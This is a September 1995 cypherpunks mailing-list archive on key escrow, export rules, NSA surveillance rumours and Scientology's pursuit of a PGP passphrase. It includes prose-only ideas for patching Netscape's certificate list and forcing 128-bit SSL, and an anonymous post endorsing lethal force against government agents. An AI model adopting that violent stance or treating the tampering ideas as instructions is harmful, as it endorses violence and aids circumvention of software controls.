Message-ID: <9509201549226130@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Thu, 07 Sep 1995 21:28:59 -0700
To: cypherpunks@toad.com
From: Joel McNamara <joelm@eskimo.com>
Subject: NIST Escrow Papers - Now Web Available

Several of the scanned hand-outs (courtesy of John Young) for the NIST Septembe

http://www.eskimo.com/~joelm

Papers include: 

The outlines of meeting topics of Raymond Kammer of NIST and Michael Nelson of 

Discussion Paper No. 4, "Example Potential Solutions for the Draft Export Crite

The Business Software Alliance's dissenting blast at the government's key escro

Trusted Informations Systems's "Thoughts on the NIST Escrow Issues Meeting Disc

TECSEC Incorporated's "Private Escrow Key Management: A Method and its Issues."

Dorothy Denning's "Comments on Draft Criteria for Software Key Escrow Exportabi





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 8 Sep 95 03:30:45 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Legality of Cash Transactions
In-Reply-To: <ac74e578310210048bf7@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.950908060000.4358A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 7 Sep 1995, Timothy C. May wrote:

> Try buying a car with cash, especially a car costing over $10,000.
> 
> Black Unicorn posted an account a while back (sometime last year) of his
> efforts to pay cash for a new car.

It occurred to me that the four cars I've bought in my life have been paid 
for in cash.  Of course my taste for 10-year-old cars makes it easier to 
keep the price under $10,000.  Indeed, I think the most I've ever paid 
was less than $3100.

DCF

"Too bad for Packwood he didn't hack two people to death with a knife.  
He might have gotten off."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pfarrell@netcom.com (Pat Farrell)
Date: Fri, 8 Sep 95 06:39:12 PDT
To: pfarrell@netcom.com
Subject: Day 2, nist GAK meeting
Message-ID: <199509081336.GAA16190@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Date: Fri, 8 Sep 1995 09:32:43 -0400 (EDT)
From: "Pat Farrell" <pfarrell@127.0.0.1>
To: cypherpunks@toad.com
Cc: 
BCc: 
Subject: Day 2 NIST meeting notes
X-NUPop-Charset: IBM 8-Bit


Thursday's GAK Export meeting started with reports from the prior
afternoon's breakout meetings. I reported on the session I was in,
saying what I posted to the list yesterday (about National Semi's product,
etc.) The other breakout groups reported their problems with the
criteria, again asking that #9 be dropped, longer, keys, etc.
The presentation for Group "A" was different. It was a speach.
It asked that the process be stopped to let industry develop
market-driven solutions. It was greeted by applause from the
vendors and privacy advocates, with no reaction from the
government representatives.

Randy Williams of Commerce, and Dan Cook of State, described the
current export approval process. Lots of talk of jurisdictions
and types of liscenses. I quickly got lost in the jargon.
The moderator wisecracked that the official language of the session
was English. You couldn't tell from some of the exchanges.

They were questioned on import restrictions. Both Williams and Cook
said that there are no import restrictions into the US. They also
pointed out that Treasury, not State or Commerce, has jurisdiction over
imports.

An engineer from Compaq asked a question: He said that his company
buys liscenses to software, and bundles it as "value added" to
their systems. They are interested in bundling in security features.
He asked if his computers would then be subject to export restrictions.
The answer was yes. He asked if he could purchase security software
overseas and import it. The answer was again yes. He asked if
he could install that software on his computers, again yes. And
export the computers, NO. They didn't even seem to think that this
was illogical.

So Commerce, State, and the rest of the government are activly
encouraging the development of competing software industries in
Israel, Germany and other counrties. I hate to think what they'd
do if they tried to hurt US industry.

And interesting tidbit came up after the session. In an offline
conversation, the topic of "personal use export" came up. A
reliable source said that revised regulations are being developed,
and will, be avaialble soon. I explicitly asked if this meant
"PGP on a notebook computer" and was told, Yes, that will be allowed;
with the usual rules that it can't be for export, you can't be attempting
to sell it, etc. Personal use, carry out and carry back. The "source" was
asked if they had read Matt Blaze's personal use disaster story.
The name didn't ring a bell, but the story was well know and considered
a nightmare.

Penny Brummitt of NSA was to talk about Clipper's key escrow agents,
but called in sick. I didn't catch the name of the replacement.
He talked about Clipper's process, not as an example of what will
be required for GAK agents, but as an "existance proof" that some
agents can be found.  The essence was that Clipper escrow facilities are
strong, and staffed with people cleared to the "Secret" level. They also
tosed out the phrase "US Person" in regard to the corporate entity that is
responsible for the contract.

Geoff Greiveldinger, of the US Department of Justice, gave a frequently
inaudible recounting of the evils of strong encryption in the war
on D, P, & T, and also corrupt mayors. He was very personable. He also
sounded like a fascist. Throughout the meeting, all sides tried to
have a civil discussion, even though we disagreed. It was
impossible to stay civil through his drivel. Ruby Ridge and Furman
had been unmentionable up until his speach.

Mr. Greiveldinger said that acceptable escrow agents will be in the US.
This caused considerable concern among vendors trying to sell
in the International market.

Dan Weitzer of CDT (the EFF spinoff) gave a short, rousing speach. It
was a call to arms. He said that since NIS&T was ignoring the
consistant input from industry to stop this silly and stupid GAK, that
we need to immediately contact our congresscritters.

Ken Mendelsen [sic?] of TIS gave a great speach. He suggested that
the critera for escrow agents be the same as the form to export tanks
and other munitions. Then he showed the one page form used by State.
He argued that legislative solutions to the escrow agent approval process
will take too long and kill the effort. I'll try to get copies of his
presentation.

F.W. Gerbracht, Jr a VP Merril Lynch, represented the Securities Industry
Association. He said that they are willing to work with the government,
but they need long keys, strong ciphers, and international escrow agents.
He used the phrase "unlimited algorithms and keyspace" as a requirement.
They also need buy in from their regulators, and presented a long list
of SEC, CFT, NYSE, NASDealers, and 50 state regulators, all who have
to sign off.

Nanette DiTosto of Bankers Trust gave a short, to the point presentation.
She said that BT has a commercial key escrow service, but that was not
what she wanted to get accross. She said that multinational banks demand
strong encryption and non-US escrow agents. And that they would
settle for nothing less.

A speaker from VTW gave a nice presentation. VTW is something like
voter's telecommunications watch. They have a mailing list, at
listproc@vtw.org. He said that escrow was doomed to failure. That there
is no middle ground. I'll try to get his slides too.

Jack Wack of TECSEC gave a pitch for his shrinkwrapped product. He
said it is exportable now, they've jumped through all the hoops.
He also gave a great crack from his son. It want roughly like:
"Dad, if you own the data before you encrypt it, how come the
government says you don't own it after you encrypt it?"
It brought down the house. (if someone has a more accurate quote, please
let me have a copy).

Professor Hoffman of George Washington gave a great speach. He listed
the Al Gore to Maria Cantwell letter's criteria, as a matrix. He then
filled in the matrix with the Export GAK's criteria. It was painfully
obvious that the NIST/NSA propsal didn't come close. He recommended
that they focus closly on the Gore criteria, and come up with an
approach that meets all the the criteria.

While I planned on staying for the remainder of the meeting, a crisis
came up at my day job. I can't say I was looking forward to more,
a day and a half was enough for me, and I wasn't the only person leaving
early. Attendance was down visibly Thursday relative to the first day

Pat

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBMFBGEbCsmOInW9opAQEfQgP+P/P0MRGe3EOElzM0UPQy+xce0XGe3wex
gfQdTrGWhL+FbYt/7taj6jgtcRg9zih1yQ3W+kN/VUXY9J4I1b6dw+j0sb6MkCjT
pShnflDI5OPQmmUq9KZlmy50u2yXuBqfWSdXd9NypjDsh7XDrWIqvqIcuT1cc/di
quNZ3u7aymw=
=oJC7
-----END PGP SIGNATURE-----

p.s. please let me know if this one's pgp sig is better than yesterday's

Pat Farrell      grad student        http://www.isse.gmu.edu/students/pfarrell
Infor. Systems and Software Engineering, George Mason University, Fairfax, VA
PGP key available via finger or request           #include standard.disclaimer




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 7 Sep 95 21:50:51 PDT
To: cypherpunks@toad.com
Subject: Re: GAK
In-Reply-To: <Pine.D-G.3.91.950903212120.8430B-100000@dg.thepoint.net>
Message-ID: <199509080450.GAA29735@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


In article <Pine.D-G.3.91.950903212120.8430B-100000@dg.thepoint.net>,
bdavis@thepoint.net (Brian Davis) wrote:

>I, of course, know of the "dislike" of GAK here.  I am curious to know, 
>however, if the "dislike" is because government would have access under 
>any circumstances or if the primary worry is that government will cheat 
>and get access when most would agree that they shouldn't (either by the 
>judge "cheating" or a TLA stealing it).

Speaking only for myself, I would resist government access to my data or
property. Court orderd warrant or not. I firmly believe that the majority
of "lawful" acts the goverment in its various incarnations commits every
day is in violation of not only the US Constitution, but of the natural
rights given to me as part of my humanity. I therefore hold that I have
right, if not the duty, to resists these acts in anyway possible, upto and
including the use of lethal force. The number of citizens who share this
opininon are growing every day.

--anon, due to the denoucement of the Bill of Rights by the criminals in
high office.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Fri, 8 Sep 95 08:43:59 PDT
To: remailer@bi-node.zerberus.de
Subject: No Subject
Message-ID: <9509081540.AA08797@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


How much you want to bet that a first copy goes to virginia?

Patrick

> 
> NY Times, Sept 8, 1995.
> 
> 
> Intel Wins Contract to Develop World's Fastest
> Supercomputer
> 
> By Lawrence M. Fisher
> 
> 
> San Francisco, Sept. 7 -- The Intel Corporation said
> today that it had won a a contract from the Department of
> Energy to develop what it called the world's fastest
> supercomputer.
> 
> 
> The machine, to be built at an estimated cost of $45
> million, would use 9,000 of Intel's forthcoming P6
> microprocessors linked in a configuration known as
> massively parallel. In recent years, massively parallel
> computers using thousands of relatively inexpensive
> off-the-shelf chips have stolen the performance lead from
> traditional supercomputers like those made famous by Cray
> Research Inc., which use far fewer, but far more powerful
> processors.
> 
> 
> Intel said its new supercomputer would be the first to
> achieve the goal of calculating more than a trillion
> floating-point operations a second, known as a teraflop.
> The machine, to be kept at Sandia National Laboratories
> In Albuquerque, N.M., would be used by Department of
> Energy scientists to study a variety of complex problems,
> foremost among them nuclear weapons safety.
> 
> 
> "President Clinton is committed to ending underground
> nuclear testing," Victor Reis, Assistant Secretary for
> Energy Programs, said in a statement. "Computer
> simulation will be a principal means for insuring the
> safety, reliability and effectiveness of the U.S. nuclear
> deterrent. We are embarking on a 10-year program to
> advance the state of high performance computing to meet
> national security objectives," he said. ...
> 
> 
> ------
> 
> 
> 
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 8 Sep 95 09:11:00 PDT
To: Alan Horowitz <alanh@infi.net>
Subject: [NOISE] Re: Are booby-trapped computers legal?
Message-ID: <199509081610.JAA08664@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:52 PM 9/7/95 -0400, you wrote:
>I am pretty sure that it is lawful to use deadly force to protect 
>property, in New Mexico.

It's legal everywhere in the US - just some places make you contract
out the dirty work to guys in blue suits...

I agree with Sandy's comment that it makes much more sense to have
any boobytraps designed to destroy data, rather than kill intruders.
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 8 Sep 95 09:12:45 PDT
To: cypherpunks@toad.com
Subject: Re:  GAK Hacks
Message-ID: <199509081611.JAA05733@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


It is interesting to see that the proposed solutions to avoiding GAK
hacks (URL:http://www.eskimo.com/~joelm/criteria.txt) largely revolve
around certificate restrictions.  Only keys signed with certificates from
accepted escrow agencies can be used, and there is a "root certificate"
used to authorize new escrow agencies.

This is similar to some of the restrictions in the widely used Netscape
web browser.  It only accepts certificates from a limited number of
agencies (actually only one which is public, the RSA spinoff
VeriSign).  This limitation is not based on escrow approval as in the
GAK papers, but it ends up with something of the same results:
interoperability with Netscape is only possible if you go through
approved channels.  And supposedly VeriSign does not make it too easy to
get a certificate if you are not a straight-arrow corporate type.

Maybe it would be good practice for a future GAK hack to try fixing these
problems with Netscape.  I could see two possibilities.

One would be to create a patcher which would let you change the set of
certificate authorities accepted by the browser.  Currently the browser
accepts at least one (an internal Netscape test CA) which is not needed
by end users.  Maybe its public key could be statically overwritten by
the patch program with the public key of the replacement CA.  This sounds
simple and safe.  The patch program can confirm that the data being
changed matches the test CA.

Another idea would be to patch the browser to emit full 128 bit SSL
rather than the crippled 40 bit SSL it currently creates.  This would be
trickier as it requires code changes, but they may not be as bad as it
seems.  The 40 bit SSL is actually calculated as 128 bits internally.
Then 88 bits are sent in the clear.  We would need to skip sending those
88 bits, and also change the transmitted bytes which encode which
encryption is being used.  This shouldn't be too bad as it mostly would
eliminate code or change some static values.  The one thing I am unsure
of is whether the 40 bit version sends the entire 128 bit SSL key in the
RSA encrypted data (88 bits of which would be redundant, also being sent
in the clear) or whether it sends only the 40 bits RSA encrypted.  If the
latter it would be somewhat more work to do the patch because now a
larger value will have to be packed into the RSA record.  If it is sending
the 128 bits all the time then the patch would be much easier.

This second patch is more advantageous for end users as it allows them to
have strong encryption rather than the weak 40 bits which we have been
breaking.  The first would be a more direct demonstration of the
difficulties of using certificate restrictions to limit functionality.

The criteria.txt paper suggests checksumming the cryptographic routines
to prevent patches like this, but generally I think such checksums can be
defeated pretty easily.  I doubt that Netscape currently has any such
thing, though.

Netscape says they will allow some form of user specification of
certificates in a future version of the browser, but they have been
saying this for quite some time and still it is not here.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arve Kjoelen <akjoele@shiva.ee.siue.edu>
Date: Fri, 8 Sep 95 07:12:45 PDT
To: yihchun@u.washington.edu
Subject: Re: ON OFF-TOPIC
Message-ID: <199509081412.JAA05507@shiva.ee.siue.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Sep 1995 yihchun@saul3.u.washington.edu wrote:

> > Poor you, the only major political party to come out with a pro crypto 
> > statement is a socialist party.

>I think the libertarian position is inherently pro-crypto.
>Besides, the French are socialist, and well, as far as crypto goes...

Wrong!  First of all, Jacques Chiraq (French President) and the majority of
the French parliament are conservatives.  Secondly, a statement like
"the French are Socialist" is a (untrue) generalization.  You are probably
thinking of Francois Mitterand ("socialist"), who became French
President in the 80's, and the first French Socialist President ever.

Chiraq, by the way, is the genius behind the recommencement of 
Nuclear testing in French Polynesia

"Test them in France if there's no risk of radioactive leakage"

-Arve Kjoelen
Southern Illinois University at Edwardsville




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Fri, 8 Sep 95 06:39:02 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: Cypher Rant II: Why Private Cryptography should not be regulated.
In-Reply-To: <30502bf1.flight@flight.hrnowl.lonestar.org>
Message-ID: <Pine.PMDF.3.91.950908093640.539028880H-100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


forgive me for the advertisement, but I *am* a lawyer, and I think this 
well-intentioned rant gets some stuff wrong.  If you want to know why I 
think this, visit my homepage and follow the link to my Clipper paper.
Please note the homepage is a bit mobile right now; this address is 
temporary, but the next one should be stable.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See (soon to move to its real home): http://www.law.miami.edu/~mfroomki





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Fri, 8 Sep 95 07:27:03 PDT
To: cypherpunks@toad.com
Subject: Jimmy Upton's T-shirt (NIST's 9/6-7/95 meetings)
Message-ID: <9509081402.AA09452@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


The meetings included break-out groups, each of which had a moderator (mine
was from NSA -- were they all?) and each of which had a recorder who would
then report to the entire assembled group.

Jimmy was a recorder once -- one of the last to report on the second day.
Nearly every person speaking from industry started his remarks with the
same disclaimer:

	My comments on these criteria should not be taken as
	an endorsement of the concept of key escrow

Jimmy Upton, rather than start his report with that disclaimer, suggested
that perhaps we should have T-shirts made for conference attendees stating:
"My comments on these criteria...."  The crowd broke up in laughter and
applause.

Speaking of applause -- the assembled audience was relatively passive
through most of the presentation -- but whenever someone expressed
opposition to the whole concept of GAK, the entire auditorium applauded.
Specifically -- I was sitting near the civil liberties group (ACLU, EPIC,
VTW, ...) and they applauded but it came from all over the auditorium.
There were some who didn't -- the gov't folks, a few industry folks, ....

 - Carl

P.S.  I've put a few additions on my home page, in response to this
meeting.



 +--------------------------------------------------------------------------+
 |Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme/home.html  |
 |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
 |  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
 +----------------------------------------------------------- Jean Ellison -+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 8 Sep 95 07:55:26 PDT
To: cypherpunks@toad.com
Subject: Darren Reed: Re: NSA and the Internet.
Message-ID: <199509081455.KAA07149@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Forwarded from com-priv. Anyone out there have information they can
use to confirm or deny any of this?

.pm

------- Forwarded Message

From: Darren Reed <avalon@coombs.anu.edu.au>
Subject: Re: NSA and the Internet.
To: com-priv@lists.psi.com
Date: Fri, 8 Sep 1995 17:36:11 +1000 (EST)

Now that I've got it next to me...
 
> I was reading a journal recently which mentioned the NSA were taking
> an active role in monitoring the network at key points, such as FIX
> East and West and MAE East and West.  Can anyone comment on this (if
> they're allows :) ?
[...]

To name some more names mentioned as being NAPs under surveillance:
Pennsauken, NJ (Sprint); Chicago (AmeriTech/Bell Comms. Research);
San Francisco, CA (Pacific Bell); CIX, CA (San Jose); SWAB, North Virginia
(Bell Atlantic).

There is a rather worrying quote in the article about NASA capturing data
for the NSA.

The column closes with a comparison to a case where the NSA was almost
prosecuted by the US Justice Dept. in the '70s for anti-Vietnam War
group surveillence.

The article appeared in "Computer Fraud & Security", June 1995.
American editor is:
Charles Cresson Wood
information Integrity Investments
Sausalito, CA, USA
The article in question, titled
"Puzzle Palaze Conducting Internet Surveillance" is by Wayne Madsen of
Virginia.  No Internet E-mail address listed for either of the American
contriubtors mentioned above.

darren


------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Fri, 8 Sep 95 09:16:08 PDT
To: modemac@netcom.com (Modemac)
Subject: Re: Scientology tries to break PGP - and fails?
Message-ID: <9509081615.AA03382@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Modemac writes:
>  Yet it seems that despite all their efforts to get what they want,
>  they can't break PGP - so they have to force Wollersheim to reveal
>  the key.
>  Mr. Wollersheim has stated that he will go to jail before he reveals
>  his encryption key.
[...snip...]
>  Call this one: BIG WIN FOR PGP!

Could this be it?  The test case for forced key disclosure?  The  
Scientologists seem very determined and already have a grudge against  
Wollersheim (according to a web page I saw Co$ owes him several million from  
a settlement).  Has Co$ filed against Wollersheim over this yet?

If this does go to court and forcing Wollersheim to reveal the key becomes a  
central issue, is this the test case "we" want?  Is this a "BIG WIN FOR PGP!"  
or not?

I can think of worse cases for this to come up in.  I.E. a four horseman  
case.  Here the party seeking forced disclosure of the key (Co$) is  
presumably already held in low esteem by much of the public (IMHO).  I  
suppose how this will play in the media, if at all, depends on what the  
"church" thinks Wollersheim has hidden in his encrypted data files.

It seems that the US media hasn't picked up much on the Scientology debacle  
yet... or am i wrong?


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 8 Sep 95 08:25:37 PDT
To: cypherpunks@toad.com
Subject: Re: Darren Reed: Re: NSA and the Internet.
Message-ID: <9509081524.AA09579@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


I stopped reading com-priv a year+ ago.  One of the "gadflies"
back then (name escapes me -- one of the journalists, I think, but
not Gordon Cook) said that at least the NJ NAP was moved at the last
minute.  He had proof of that.  I don't remember that he had proof that
it was moved at NSA request, although that was his claim.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 8 Sep 95 08:51:30 PDT
To: patrick@verity.com (Patrick Horgan)
Subject: No Subject
In-Reply-To: <9509081540.AA08797@cantina.verity.com>
Message-ID: <199509081551.LAA07222@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Patrick Horgan writes:
> How much you want to bet that a first copy goes to virginia?

I'm not sure that the NSA actually would want machines on that scale
these days. Its probably a lot more economical to throw your money
into lots of much smaller machines and occassionally link them up via
networks. Unlike physics simulation problems, most crypto problems
don't involve tight communication between the parallel processors, so
the extra expense that the high speed buses represent would end up
being a waste.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Fri, 8 Sep 95 09:55:01 PDT
To: trollins@hns.com (Tom Rollins)
Subject: Re: Scientology tries to break PGP - and fails?
Message-ID: <9509081654.AA03407@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Tom Rollins writes:
>  If this is the file that the Co$ is trying to crack, then what the
>  is being asked for is a pass phrase that can be handed to the Co$
>  that will pass the PGP valid key check and still not decrypt the
>  data to anything usefull.

Well, I don't have the PGP 'conventional' encryption format memorized, but  
there is probably a constant after the IV that is prepended to the data.  The  
constant is used to determine if the key is correct.  Since the conventional  
encryption runs in CFB mode and there is a full block of random IV at the  
beginning of the file, it is extremely unlikely that a key could be found  
that would properly decrypt only the first two blocks while leaving the rest  
unreadable...

>  If Larry Wollersheim does have the valid key.  It would be a simpler
>  process to know what fake key to use and work it backwards through
>  the MD5 to arrive at an ascii string to produce the fake key.

Not really.  Even if you could find an IDEA key that would produce the  
desired output it would be hard to find a passphrase that would produce that  
key when hashed.  One of the properties of one-way hash functions is that it  
is difficult to find a plaintext that produces a given hash.  Hence the term  
'one-way'....  Even if you did find a passphrase (which, if MD5 is strong,  
would require something like 2^64 operations), it would likely be long, have  
8-bit chars, and would be impossible to type in.  It would be tough to  
convince anyone that it was the real passphrase.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Fri, 8 Sep 95 10:05:58 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: GAK Hacks
Message-ID: <9509081705.AA03422@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Hal writes:
>  One would be to create a patcher which would let you change the
>  set of certificate authorities accepted by the browser.  Currently
>  the browser accepts at least one (an internal Netscape test CA)
>  which is not needed by end users.  Maybe its public key could be
>  statically overwritten by the patch program with the public key of
>  the replacement CA.  This sounds simple and safe.  The patch program
>  can confirm that the data being changed matches the test CA.

This is an excellent idea, assuming the new CA's key will fit in the same  
amount of space or less than the test CA.  How big is the test key?

Of course, Netscape could decide to remove the test CA certificate from  
future versions of the browser.  However, you could probably replace the  
Verisign certificate with your CA certificate and then have your CA sign the  
Verisign certificate so the browser can still use both.  :-)

>  This second patch is more advantageous for end users as it allows
>  them to have strong encryption rather than the weak 40 bits which
>  we have been breaking.  The first would be a more direct demonstration
>  of the difficulties of using certificate restrictions to limit
>  functionality.

I don't think this is necessary as domestic versions of Netscape have already  
been exported and are available on non-U.S. FTP sites...

>  The criteria.txt paper suggests checksumming the cryptographic
>  routines to prevent patches like this, but generally I think such
>  checksums can be defeated pretty easily.  I doubt that Netscape
>  currently has any such thing, though.

It only makes it harder to patch.  Anyone with a clue knows that there is no  
such software-only protection that can't be defeated.  Even hardware/software  
dongle type protection can be defeated by altering the software to not check.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: trollins@hns.com (Tom Rollins)
Date: Fri, 8 Sep 95 09:22:24 PDT
To: modemac@netcom.com (Modemac)
Subject: Re: Scientology tries to break PGP - and fails?
In-Reply-To: <199509080312.UAA03808@netcom15.netcom.com>
Message-ID: <9509081620.AA19816@dcn92.hns.com>
MIME-Version: 1.0
Content-Type: text


> 
> News Flash!
> 
> According to an informed source, the so-called "church" of Scientology is
> trying to force Larry Wollersheim to give them his de-encryption code for
> PGP. 
> 
> Larry Wollersheim is the director of FACTNet, a Colorado BBS that 
> specializes in distributing information about religious cults - 
> especially the Church of Scientology.  Scientologists raided FACTNet 
> recently and seized its hardware and records recently, in a case that has 
> spread news of the Scientology wars all over the Internet.
> 
> Scientology has been in possession of Larry Wollersheim's computer 
> records for quite a while now - at least three weeks, I believe.  They 
> have been scanning it for what they claim to be "copyright violations."  
> Yet, their list of scanning criteria also includes a list of 34 names of 
> their critics and enemies, including a famous Netizen named "Rogue Agent."
> 
> Yet it seems that despite all their efforts to get what they want, they 
> can't break PGP - so they have to force Wollersheim to reveal the key.
> 
> Mr. Wollersheim has stated that he will go to jail before he reveals his 
> encryption key.
> 
> Please forward this note to all interested parties.
> 
> Call this one: BIG WIN FOR PGP!
> 
> For more information on Scientology's war against the Internet, read the 
> many Web pages set up to cover the story.  My own page, an "Introduction 
> to Scientology," is:
> 
> 	http://www.tiac.net/users/modemac/cos.html
> 
> It includes a link to the FACTNet Web page, as well as Ron Newman's 
> famous Web page: "The Church of Scientology vs. the Net."
> 

I took a look at the FACTNet web page.  There is a file encrypted with
PGP using the "-c" option.  They are asking for people to help guess
the Pass Phrase.  Why would anyone bother if they had no clue that the
file contained anything 'interesting'.

If this is the file that the Co$ is trying to crack, then what the
is being asked for is a pass phrase that can be handed to the Co$ that
will pass the PGP valid key check and still not decrypt the data to
anything usefull.

If Larry Wollersheim does have the valid key.  It would be a simpler
process to know what fake key to use and work it backwards through
the MD5 to arrive at an ascii string to produce the fake key.

Too bad this wouldn't be plausable for the secret ring.  Perhaps PGP
needs an option to specify the key in Hex and make the process easy.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Fri, 8 Sep 95 10:35:59 PDT
To: Brad Dolan <bdolan@use.usit.net>
Subject: Re: Hacking banking (fwd)
Message-ID: <9509081735.AA03442@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


David Weisner writes, in a message forwarded by Brad Dolan:
>  "Already, Fuentes said, federal authorities in New York are
>  investigating whether programmers hired to write software for a
>  financial institution may have left a 'back door' open in the
>  program, one through which money may have been diverted to foreign
>  bank accounts."
>  Does anyone know what this federal investigation in New York is
>  about?   How about copying this note around and seeing what people
>  can find out?

Perhaps this is related to the recent Citicorp (Citibank?  I have trouble  
keeping up...) job done by the people in Russia?

andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Fri, 8 Sep 95 03:43:12 PDT
To: cypherpunks@toad.com
Subject: Re:(changed) Criminals and Crypto
In-Reply-To: <199509080406.AAA25183@kanga.INS.CWRU.Edu>
Message-ID: <Pine.HPP.3.91.950908121557.26441A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


Tobin T Fricke wrote:

> I think that is a good point.  Of course, if all non-escrowed
> encryption techniques were made illegal, then the criminals would
> just have another broken law under their belt if they used
> strong encryption.  After all, an outlaw is an outlaw because
> he has broken laws, so what sense does it make to make more
> laws for him to break?  Hmph.  

Exactly. As someone recently pointed out, the practical result
would only be to define a new class of single-crime criminals
(cypherpunks/cyphercriminals).

In my .se perspective this is emphasized by our penalty system.
In the foreseeable future (10 years?) they would never get away
with a harsher penalty for using un-GAKed crypto than a moderate
fine. To 'real' criminals, who usually don't have open assets to
forfeit (and the current praxis is then to forget about it after
a few years) and no reputation as law-abiders to defend, it would
be a joke, of course.

Mats 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Elliott <paul.elliott@hrnowl.lonestar.org>
Date: Fri, 8 Sep 95 05:50:40 PDT
To: cypherpunks@toad.com (cypherpunks mailing list)
Subject: Cypher Rant II: Why Private Cryptography should not be regulated.
Message-ID: <30502bf1.flight@flight.hrnowl.lonestar.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

CypherRant V2: Reasons why private cryptography should not be regulated.
 
Paul Elliott is solely responsible for this document.
Please distribute widely.
 
 
FBI director Freeh has been going around pushing his stupid plans
for cryptography regulation. Usually, these plans take the form of
some kind of mandatory key escrow. Mandatory key escrow schemes
are requirements that encryption keys be given to government agencies
with the promise that the keys will not be used without a warrant.
 
Now let me give some reasons why Freeh's requests should be ignored.
 
1) It is unconstitutional!
	a) First amendment. Electronic communications are a form
                of speech and the cryptography regulations try to regulate
                this speech to a form the government understands.
                Congress shall make  NO LAW ....or abridging the
		freedom of speech or of the press; ... 
		They really meant it!
	b) Second amendment. Cryptography is arms. Even U.S.
                government ITAR regulations admit this. Therefore
                cryptography is protected by Second amendment.
	c) Ninth & tenth amendments. Article I section 8 does not
                give congress the power to tell us what computer
                software we can run on our computers. Therefore
                that power remains with us, and we should be able
                to run whatever cryptography software we want the 
                displeasure of congress not withstanding.
	d) The power to search, if a warrant exists, which is mentioned by
		the fourth amendment, does not grant the government the 
		right to succeed in finding what the it is looking for. 
		In other words the power to search, is not a power to 
		guarantee a successful search. It is not a power to 
